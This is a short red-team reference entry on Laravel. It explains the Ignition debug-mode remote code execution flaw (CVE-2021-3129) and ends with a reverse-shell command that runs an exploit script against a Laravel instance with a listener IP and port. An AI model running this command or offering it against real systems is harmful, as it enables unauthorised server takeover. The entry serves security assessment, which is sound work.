Laravel

Laravel is a popular open-source PHP web framework designed to streamline the development of modern web applications. Built around the Model-View-Controller (MVC) architecture, it emphasizes clean syntax, modular code structure, and ease of use. Laravel comes bundled with tools for routing, database interaction, session handling, and authentication. It also includes a CLI tool called Artisan, which automates repetitive development tasks. Due to its widespread adoption and consistent structure, Laravel is frequently encountered during Red Team assessments, especially in environments using PHP for API backends, content platforms, or custom admin panels.

Unauthenticated RCE

Laravel applications (<v8.4.2) that use the Ignition debugging package (< v2.5.2) in development or misconfigured environments are vulnerable to an unauthenticated RCE flaw (CVE-2021-3129). The issue arises when Ignition is exposed to unauthenticated users, allowing specially crafted requests to exploit how Ignition processes error reporting and variable previews. By manipulating the XDEBUG_SESSION or specific POST payloads, an attacker can inject arbitrary PHP code that gets executed on the server. This vulnerability is typically exploitable in cases where debug mode is enabled (APP_DEBUG=true) and Ignition is accessible over the web. A working PoC is available.

# Reverse shell
python3 exploit.py -i 192.168.45.170 -p 80 http://laravel-instance